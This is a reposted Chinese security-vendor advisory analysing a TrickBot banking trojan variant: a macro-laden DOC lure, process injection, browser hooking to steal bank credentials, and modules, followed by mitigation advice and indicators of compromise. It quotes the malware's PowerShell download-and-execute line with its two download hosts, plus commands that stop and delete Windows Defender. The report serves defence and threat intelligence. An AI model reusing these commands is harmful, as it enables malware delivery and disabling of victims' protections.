• 注册
  • 网络安全 网络安全 关注:3462 内容:7137

    威胁预警 | TrickBot银行木马归来袭击全球金融机构

  • 查看作者
  • 打赏作者
    • 网络安全
    • 一、背景

      最近国外安全研究人员发现TrickBot银行木马最新的样本,深信服EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细分析,确认此样本为TrickBot银行盗号木马的最新变种样本,并且此样本非常活跃,最近一段时间更新非常频繁。

      TrickBot银行木马是一款专门针对各国银行进行攻击的恶意样本,它之前被黑客团伙用于攻击全球多个国家的金融机构,主要是通过垃圾邮件的方式进行攻击,此次发现的样本会对全球数百家大型银行网站进行攻击,部分银行列表如下:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构二、样本运行流程

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      三、样本分析

      邮件附件DOC样本(重命名为Trickbot.doc),如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      打开文档之后,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构分析DOC文件档,发现里面包含VBA宏代码,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构通过VBA宏编辑器解析DOC文档中的宏代码,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构动态调试解密里面的宏代码,通过CMD /C执行如下PowerShell脚本:

      powershell “function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],’%temp%\[随机名].exe’);

      start-process ‘%temp%\[随机名].exe’;}

      try{[随机名](‘http://whitakerfamily.info/ico.ico’)}catch{[随机名](‘http://rayanat.com/ico.ico’)}

      通过powershell脚本下载相应的TrickBot恶意程序,并执行。

      TrickBot母体程序(随机名重命名为TrickBot.exe),如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      1.读取样本相应的资源数据到内存中,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      资源的ID:BBVCXZIIUHGSWQ,资源数据如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      2.创建窗口,发送消息,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构3.对获取到的资源数据进行加解密相关操作,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构从程序中导入密钥1,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      从程序中导入密钥2,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构最后通过CryptEncrypt对数据进行操作,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      执行之后,在内存中将资源数据还原为一个Payload的数据,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      4.然后在内存加载还原出来的payload数据,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      5.还原出来的payload其实是一个DLL,内存加载DLL,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构定位到DLL的入口点:10001900处,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构6.判断DLL的入口函数是否为shellcode_main,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      Payload分析

      1.获取相应的函数地址,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      2.通过检查程序的运行路径,启动父进程文件,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      3.然后向启动的父进程中,注入相应的代码如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      4.检测操作系统版本,后面会根据操作系统版本下载相应的恶意文件,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      5.将程序中包含的PE代码,注入到父进程中,提取出来的PE代码,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      6.关闭Windows Defender软件,使用如下命令:

      cmd.exe sc stop WinDefend

      cmd.exe sc delete WinDefend

      删除Windows Defender服务之后,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      7.创建windows任务计划,实现自启动功能,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      启动相应的母体样本程序,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      8.拷贝自身到%appdata%\msscsc目录下TsickCot.exe程序,然后启动自身,并拉起SVCHOST.EXE进程,将恶意代码注入到多个SVCHOST.EXE进程中,然后执行,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      从网上下载多个恶意文件,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      启动五个相应的SVCHOST.EXE进程,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      下载了五个相应的模块,Modules目录下的文件,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      如果机器为64位的机器,则下载64位的相应的模块,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      相应的配置文件信息如下:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构威胁预警 | TrickBot银行木马归来袭击全球金融机构威胁预警 | TrickBot银行木马归来袭击全球金融机构

      不同的SVCHOST进程,执行不同的功能,通过不同的配置文件。

      (1)systeminfo32盗号用户主机系统,服务,安装程序等相关信息。

      1.获取相应的函数地址信息,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构威胁预警 | TrickBot银行木马归来袭击全球金融机构

      2.获取计算机信息,收集用户系统版本、CPU信息、内存大小信息、软件安装信息、系统服务信息,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      3.查询主机系统版本,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      4.通过遍历注册表获取当前系统的安装程序信息,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      5.查询主机相关信息,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      6.查询主机进程相关信息,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      (2)injectDll32盗取用户网银帐号

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      1.检测相应的浏览器进程,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      2.获取浏览器进程通信数据,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      3.对浏览器进程,注入相关的代码,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      4.根据配置文件相关信息,进行过滤,然后对浏览器进程进行HOOK,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      HOOK之后的进程列表如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      5.解密出来的配置文件信息,如下所示:

      dpost配置文件(由于文件太大,截取部分)

      威胁预警 | TrickBot银行木马归来袭击全球金融机构sinj配置文件(由于文件太大,截取部分)

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      dinj配置文件(由于文件太大,截取部分)

      威胁预警 | TrickBot银行木马归来袭击全球金融机构上面只是截取了配置文件部分银行列表,从配置文件上可以看出,涉及到全球几百家银行机构网站。

      此样本的流量分析,从网上下载相应的TrickBot木马,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      上传到恶意服务器的数据包,都是经过加密处理的,加密算法未知,如下所示:

      威胁预警 | TrickBot银行木马归来袭击全球金融机构

      此银行木马最近非常活跃,版本也不断更新当中,主要针对全球银行金融机构进行攻击,样本涉及到的模块较多,功能比较复杂。

      同时深信服EDR安全团队发现最近ZeusPandaBanker、Gozi、Pegasus、Ratopak、Ursnif等银行木马的变种家族都非常活跃,更新频繁,这些家族主要针对全球各大银行进行攻击。

      四、解决方案

      深信服EDR安全团队提醒广大用户:

      1.不要点击来源不明的邮件附件,不从不明网站下载软件。

      2.及时给主机打补丁,修复相应的高危漏洞。

      3.对重要的数据文件定期进行非本地备份。

      4.尽量关闭不必要的文件共享权限以及关闭不必要的端口,如:445,135,139,3389等。

      5.RDP远程服务器等连接尽量使用强密码,不要使用弱密码。

      6.安装专业的终端安全防护软件,为主机提供端点防护和病毒检测清理功能。

      五、相关IOC

      MD5

      A8CD87036ECDDFBA234E3796D93FE667   ico.ico

      5DFEA92F65755CF314180DB40596B9FE   injectDll32

      A652BAD6746C739CC8E69B077E6ED396   injectDll64

      B3A9D059584418A2A0803FB0C6753EA9   systeminfo32

      5D4512296AA66BFC0F2AE610556D84F2   systeminfo64

      30562B6FE4D8EFDCE3783CDD0909FFE6   networkDll32

      F877C696C4082654FE64E135966FFCC6   mailsearcher32

      3C0A14D3E4E5F1968434ECB017A4689B   importDll32

      IP&URL:

      94.103.81.144:447

      82.202.221.78:443

      90.69.224.122:443

      82.202.221.163:447

      185.13.39.197:443

      94.103.81.144:447

      109.234.39.42:447

      188.124.167.132:8082

      193.151.99.8:8082

      162.249.229.101:8082

      200.46.129.90:8082

      70.79.178.120:8082

      195.54.163.184:443

      whitakerfamily.info 77.72.1.66

      rayanat.com  104.244.127.60

      链接

      此银行木马变种相关MD5样本:

      00c783ed3ec30f1b13db8e4f0008d1d9

      522f44d30d15f8d03ecbee8ffe512f29

      2ad35fa357a1a13658d6107934be41cc

      6124c863c08f92732da180d4cf7cbf38

      d98badb54f293a925359e74dad2e05cd

      24acb11ecc19c40410ad5f2572cb70d3

      da50d3f3dcf8ab927b77ed72cf5682d9

      2bcac6bd4ea7790a9f037a4038b9d6c4

      f3cde217a20a854aafa1a991da04c138

      9979eb8a5e2c4fd32938497e6d4f896b

      8fc45b16bec114a0dbb2035be651952b

      3d1958a4ce83ca967dc4318ef2fba83b

      380dc556f2c6fa232c0a7a5140f91201

      54bc795028a9a3f1467d8ba8a3f1f5a2

      faad8b0e030701d6f54f32b552e12382

      ea7d592a67a86b28f6ed0093ed5d0530

      6d9cbb2a2213164613b5d1abb8b5e192

      beac135dace12faa4d2a91a9d4a014fb

      b7c16e0d9986e662d1becc2d295b6e01

      4269f6d322adf8ca9cb5eb7621859d50

      06b202b24e2490af0560cf6e90a3ece1

      08f7bd9ef4eb5a7f41ece67bc5a71116

      4686479cb1d5fad4672980d0f72c21ef

      a469be02ff61bc09f6b6ddf0288912c7

      c1a8adaebaecd0cccc10aef6c9c16bf2

      d7a0d269eb3f024986e18b071b18b3f0

      94da8818d83bccd75aeb2314ec5337d8

      f7809b17ed9a8ec4082259079e4f617e

      922f26076daf81c300e303f032541a47

      df89c3bde71dbe11fdcd115db2d38ddc

      f5192a4960fd5ef69032e78f4e8b38c9

      a1c2e8e735590b030279af638c4da791

      a5d2080603a74b92744cb08186be7324

      2d9183ce82f6d4eff494fcc42a75b878

      3a8812ce7d48b6ec713de3a5a0efe646

      989a54e314933e620bb69a1e768405f4

      38f8d8dce460c79e47ccf8d0559d5ecf

      cbb0ce54b5eec9de6ed74a9d5f0ac537

      9ab498fc22237101236fb0048709795b

      de1ce3514f777178d672ee79ac398a74

      c8289bd00c65aa98ee73507fd18b5b95

      92c73d8750f7de2e535360fce16e6565

      028e30f7b50fd2ab2cd9df91cd3fd66d

      483c84066f957662d3f3e490898ad996

      8cd3ba008c93327369b3d50341db8f74

      3d017b71fa8ba996f251d121521cd0f7

      f0370f160bfa8338f386a0bdf4d1b481

      5919aabbf2a93c1f1c2f492a8dac755e

      f9f9f5e74c4d24a5517a05bd5c2025eb

      cfe7bdedf0b91c6bba2d720f75b73667

      edccfe5ef48de6b0f3bbf53cc1012533

      5e72f8a9dad93cf1dbe6e2d4d3cf3dee

      fbab92e484dbf4e22e8b32e8a0a14f3a

      f9c51b9ddc15e9625aec2fba4deb4d7a

      a6b15ca41e52fcb7bf3dc5941af950fe

      7980226010f02292d8cbac440c9c0443

      44de98af8b6588ea597cdc95844fdda6

      8e957840019b780a52f87c4176afcf43

      96985dff8be2912fe2d02752b5d4a073

      a6dce7423960304106b6ad8d7f7d9fad

      c2d2cff7e78292637f831aa97d2ffb0f

      837117ca7de80b18182d1ecc38a83faa

      fad828733cde4018d2f7dcdc6e2e4bae

      eaf0e8ad1f63831108cae73b20b7b0c8

      f0bd265c4732a39c800c7f36c4f6d5cc

      dae500bf3c3d02a2e7a4baa07ef349f7

      40d8ce3c2b8f49798a882b6c34f6c315

      c1e3c3dd57654f19676e446474bbdd92

      609f7242b99358225b30c587f1186554

      a662cfe0c40942412fcc8e71912305fc

      227c63dbba61806ba3833f1f30516f22

      d2d7a0384f6a5e4e7a2eb59a5f4488da

      6b7cd6c2712542857f131349c772c9dd

      dd8039995c5c218eae97b0bd1f2e65b0

      35464492a9b2e63ac10e12d3babc89a7

      c479099e2934e284e4bcd3c5b75beab0

      284eca5253a65e73b5c0d805b5b5cd0d

      7e300630af2923f0ca5c79811993e982

      7a0f9608b48ba4838c24b864fd76ade5

      88cd706ce6cbadc7e1722b1fcea7de41

      0bd3aa3b71b481e47ca40b4497b7a8c3

      73582cd6bd542a34fa36a6a8c768307c

      0dc94f956e517ea69f4a3cd623bebb59

      90eeed0624377283c4051f75e3752494

      79d737143963888a824c35d09d6b0926

      5f3969937055daddfb338dbcda32c518

      80205bfb1c9ad950012378b69413630d

      d1e66c20f3d6e756bd7f3cde6d560a4d

      9b4bceda48cbd1ea5a848797e909dcbf

      fabfc503eb52ce5d44363bfa139aed69

      77bfe45f5991d36830c1ecd2d5311e6b

      8c1933fe2278e15299158ec894abfc78

      65c0910b047c11038ea5b723b43a6647

      781a966bd0cf5fc4059d5670a5c8dfb5

      72284c43ec4d9ff61c78970fef9b6c4b

      6f2b25443630928d3408f35174898979

      a2266baca1e5c71209f6c957af18e3f4

      7302c18f5015740f7dbab389fbb71196

      c4634916686ad740e1d17f23721152e2

      c8faa8cb0e2412421c7263936f6734ea

      6024143edd8331063a2b1af6fffbe0c0

      c52cba3359ef8b900b25dd81ec5df47d

      60be89cfcec7b0f485bba11b53df8d4c

      7c728c2d9b9e1f5518aa6013db02cc0b

      3d55d71c3f0655837694ea125687e479

      3865ad4479d2e21b84e751044bf94c76

      74227f2c7fc61aac5209a70d0e2d68f0

      4598fe6c73be9f241006dfb35a76704a

      9a163fa52d9cdd9f9c5e7b1549233b4d

      3d3e08ad3a8f3b35b9a10aa6c57b290f

      e35e2ac95a98d7a0651f4991837c36de

      3ae26d6afc281d10592543c9bbd7560d

      8fed59d5bc87c3b5794bca3e519ff2f4

      请登录之后再进行评论

      登录
    • 发布
    • 设置
    • 帖子间隔 侧栏位置: